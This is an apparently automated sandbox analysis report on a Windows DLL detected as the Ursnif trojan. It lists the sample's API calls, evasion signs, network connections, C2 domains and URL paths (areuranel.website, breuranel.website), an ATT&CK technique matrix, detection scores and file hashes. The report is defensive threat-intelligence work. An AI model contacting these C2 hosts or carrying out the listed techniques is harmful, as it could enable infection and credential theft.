                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F076CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F06B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F076CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6F06B316

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.34 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.97.178.98 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000002.748732081.0000000001450000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.564391142.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.751742629.00000000033F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584065442.00000000037A0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.588170408.0000000003210000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6F090E4C
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6F069EB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F090429
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E448
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E344
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6F09E3AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6F09EA21
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F090E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F069EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F090429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F09E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6F09EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6F09E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6F090E4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6F069EB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F090429
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E344
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6F09EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6F09E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303A82B cpuid 3_2_0303A82B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6F031172
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08FF15 _free,_free,_free,GetTimeZoneInformation,_free,0_2_6F08FF15
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6F031825
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_0303A82B

                      Stealing of Sensitive Information:

                      Yara detected Ursnif

                      Remote Access Functionality:

Yara detected Ursnif

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

                      Behavior Graph

[Behavior graph: ID 500299; Sample: B6VQd36tt6.dll; Start date: 11/10/2021; Architecture: WINDOWS; Score: 96]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
B6VQd36tt6.dll | 17% | Virustotal |
B6VQd36tt6.dll | 24% | ReversingLabs | Win32.Trojan.Ursnif

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
3.2.rundll32.exe.3030000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
0.2.loaddll32.exe.d50000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

Source | Detection | Scanner | Label
areuranel.website | 7% | Virustotal |
breuranel.website | 7% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
https://areuranel.website/ | 7% | Virustotal |
https://areuranel.website/ | 0% | Avira URL Cloud | safe
https://areuranel.website/liopolo/rWpAIhmksB/fMLnE1PXrqd2VqbBj/OJg6ENFLsvoK/2bIbYQZt6Yx/_2FaLr_2FAyB | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
https://breuranel.website/liopolo/gMrPChFga/JRICWiSmidyxIDHRRF29/nBc8QVOwWK1fs_2BdoE/a_2FMpJCzeZdSQf | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
msn.com | 13.82.28.61 | true | false |  | high
outlook.com | 40.97.161.50 | true | false |  | high
HHN-efz.ms-acdc.office.com | 52.98.199.194 | true | false |  | high
FRA-efz.ms-acdc.office.com | 52.98.208.66 | true | false |  | high
www.msn.com | unknown | unknown | false |  | high
www.outlook.com | unknown | unknown | false |  | high
areuranel.website | unknown | unknown | true |  | unknown
breuranel.website | unknown | unknown | true |  | unknown
outlook.office365.com | unknown | unknown | false |  | high

                                    Contacted URLs


                                                  URLs from Memory and Binaries


                                                                                Contacted IPs


                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.98.199.194 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.98.208.66 | FRA-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.97.178.34 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
52.97.178.98 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
40.97.161.50 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

                                                                                General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500299
Start date: 11.10.2021
Start time: 22:32:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 16s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: B6VQd36tt6.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@14/12@14/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 13.2% (good quality ratio 12.5%)
• Quality average: 77.9%
• Quality standard deviation: 29.8%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 57
• Number of non-executed functions: 189
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .dll
Warnings:
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.10, 2.20.178.56, 95.100.216.89, 20.50.102.62, 131.253.33.203, 204.79.197.203, 20.189.173.22, 104.208.16.94, 20.189.173.21, 52.184.81.210, 2.20.178.24, 2.20.178.18, 20.54.110.249, 40.112.88.60
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                Simulations

                                                                                Behavior and APIs

Time | Type | Description
22:35:22 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

Match | Associated Sample Name / URL | Detection
52.97.178.98 | uT9rwkGATJ.dll | malicious
52.97.178.98 | https://storage.googleapis.com/aoffice365-eposes-451227998/index.html | malicious
40.97.161.50 | test1.dll | malicious
40.97.161.50 | 6.dll | malicious
40.97.161.50 | 6101135878f66.dll | malicious
40.97.161.50 | a9FUs89dWy.dll | malicious
40.97.161.50 | 609a460e94791.tiff.dll | malicious
40.97.161.50 | 13fil.exe | malicious
40.97.161.50 | 24messag.exe | malicious
40.97.161.50 | .exe | malicious
40.97.161.50 | .exe | malicious
40.97.161.50 | 66documen.exe | malicious
40.97.161.50 | 9messag.exe | malicious

                                                                                                          Domains


                                                                                                          ASN

Match | Associated Sample Name / URL | Detection | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | B6VQd36tt6.dll | malicious | 52.97.183.162

                                                                                                          JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
ce5f3254611a8c095a3d821d44539877 | B6VQd36tt6.dll | malicious | 52.98.199.194, 52.98.208.66, 52.97.178.34, 52.97.178.98, 40.97.161.50, 13.82.28.61
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          Dxr7myLbG2.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_09f0aab7\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11922
                                                                                                          Entropy (8bit):3.757615495140162
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_06908bb5\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12044
                                                                                                          Entropy (8bit):3.7648840989529164
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_06a0b526\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12042
                                                                                                          Entropy (8bit):3.7633224655126005
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B10.tmp.dmp
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:32 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35256
                                                                                                          Entropy (8bit):2.4208959350942596
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER63AC.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8406
                                                                                                          Entropy (8bit):3.6987300061265027
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER67D4.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4771
                                                                                                          Entropy (8bit):4.486523273735861
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D9E.tmp.dmp
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:38 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63018
                                                                                                          Entropy (8bit):1.9002202523498852
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER788B.tmp.dmp
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:41 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35698
                                                                                                          Entropy (8bit):2.408099527928471
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CD2.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8306
                                                                                                          Entropy (8bit):3.6950985837951538
                                                                                                          Encrypted:false
                                                                                                          Malicious:false
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER837A.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4630
                                                                                                          Entropy (8bit):4.455697919266282
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cvIwSD8zsmJgtWI9p5rWSC8BfM8fm8M4JCds9Fex+q8/5Y4SrSxd:uITf8yUSNpxJ4xzDWxd
                                                                                                          MD5:B1DDC3420DFB7C2BBA3617F7CDF427FE
                                                                                                          SHA1:E23312B013B75C48E88A357A5785379F3DCFF69C
                                                                                                          SHA-256:B245B4E2C87A879130313F58B73202BFAAD8682932594690378021E4AED06ACA
                                                                                                          SHA-512:A72D80A2C8C5B06DFC7AA9B79A12FEDDD40BCFD5633AA9E3591693278561DF8D24AE857B9E74B8B95BCB10656F2C33631E63BCD939C6F9B5B6D1AF88E6B8E085
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER88E7.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8406
                                                                                                          Entropy (8bit):3.7004888092021453
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rrl7r3GLNiF06X6Yuy6pgmf8eSjwZCprI89bsfsf8Em:RrlsNiW6X6Yb6pgmf8eSjwEsEfW
                                                                                                          MD5:F9B0FDED752EEA1C8BA95054EBA02EFE
                                                                                                          SHA1:2D27B171C34E2014EF1EF7CACC6B1F114499504C
                                                                                                          SHA-256:F2689516846EB5ED28B5A31DBD00A54AE06BBCAF0FA57CFDB94889D8E4B7BD7C
                                                                                                          SHA-512:15602AAE224847856A1DBA1C017A5D38D1B45B05B8EF78743525D03E7A75BA62ADD39DF76C5995E5D90F7EA34BDC971691996F92B80133FB560388E305A6D5DD
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>2772</Pid>
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CD0.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4771
                                                                                                          Entropy (8bit):4.483807136834076
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cvIwSD8zsmJgtWI9p5rWSC8B2+8fm8M4JCds0MFP+q8vjs0Ji4SrSUd:uITf8yUSN87JyOKtJiDWUd
                                                                                                          MD5:40F554717EE45DC3457D352B8AE8CFA3
                                                                                                          SHA1:0BC9E6BF5E0BEB76C6996B7F162A3C4E60F3CEFC
                                                                                                          SHA-256:1F4F99A93A24C94FAC6CF76BBC62F517BEB2A4000011AFCE29662591E2C55F84
                                                                                                          SHA-512:7E70A8B81B3FA28DF4F997DBC8FE9D7DB3C926FE6C5A7FA5F98A062A78412E458B61F7A60D50940E13514A2252D0F40FE7F02FED07A8F9FF65A273858C654242
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.67002840473361
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:B6VQd36tt6.dll
                                                                                                          File size:718336
                                                                                                          MD5:c4c060ec6b1e42d70972d0af66a04e66
                                                                                                          SHA1:3ef84847fceb31b8814c12c94c57c72a5281d6f5
                                                                                                          SHA256:47715e425398283d53019c270311ad0c709f660048d2f884d5116d80b983743f
                                                                                                          SHA512:5553d68867af378d347620208b35d4d6261526770cf2a47884f0eff17392cedfa91ab491265717a459b4ccbe43f490a90caaf9289b9f92e8cd63140710e9ca78
                                                                                                          SSDEEP:12288:QUAQSxT6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XPGAsx:Qz3xT6fq8Np6bTPPaBreaZlYCOSVolam
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..Ox.`.x.`.x.`..~..{.`.q...m.`...b.|.`...e.q.`...c.l.`..~..o.`.x.a...`...e...`...`.y.`...`.y.`.x...y.`...b.y.`.Richx.`........

                                                                                                          File Icon

                                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x1003ab77
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x10000000
                                                                                                          Subsystem:windows gui
